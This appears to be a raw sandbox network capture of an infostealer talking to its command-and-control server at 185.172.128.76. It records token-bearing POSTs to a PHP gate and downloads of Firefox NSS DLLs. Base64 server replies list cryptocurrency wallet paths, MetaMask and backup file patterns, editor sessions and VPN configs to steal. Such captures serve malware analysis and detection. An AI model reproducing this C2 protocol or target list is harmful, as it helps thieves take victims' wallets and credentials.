Apr 27, 2024 00:46:18.184789896 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJ Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 [TRUNCATED] Data Ascii: ------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file"------BGIJJKKJJDAAAAAKFHJJ--
Apr 27, 2024 00:46:18.495563030 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:18.843976974 CEST	93	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 00:46:19.124541998 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:19 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B [TRUNCATED]
Apr 27, 2024 00:46:24.300966978 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 00:46:24.723239899 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 00:46:24.999392986 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:24 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B [TRUNCATED]
Apr 27, 2024 00:46:29.206907034 CEST	94	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 00:46:29.493748903 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:29 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B [TRUNCATED]
Apr 27, 2024 00:46:33.823542118 CEST	90	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 00:46:34.104212046 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:34 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 27, 2024 00:46:47.207110882 CEST	94	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 00:46:47.484200954 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:47 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B [TRUNCATED]
Apr 27, 2024 00:46:49.121514082 CEST	98	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 00:46:49.397558928 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:49 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B [TRUNCATED]
Apr 27, 2024 00:46:52.360130072 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGHJEBFBFHIIECAECGH Host: 185.172.128.76 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:52.692549944 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:52.764131069 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGCBAFCGDAAKFIDGIEG Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 2d 2d 0d 0a Data Ascii: ------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="message"wallets------EBGCBAFCGDAAKFIDGIEG--
Apr 27, 2024 00:46:53.048584938 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
Apr 27, 2024 00:46:53.061424971 CEST	466	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGH Host: 185.172.128.76 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"files------JEGHJDGIJECGDHJJECGH--
Apr 27, 2024 00:46:53.347691059 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 [TRUNCATED] Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBN [TRUNCATED]
Apr 27, 2024 00:46:53.395138979 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHI Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:53.723438978 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:53.735289097 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:54.036993980 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:54.068773985 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:54.378571987 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:55.815548897 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFHDBFIDAECAAAKEGDA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
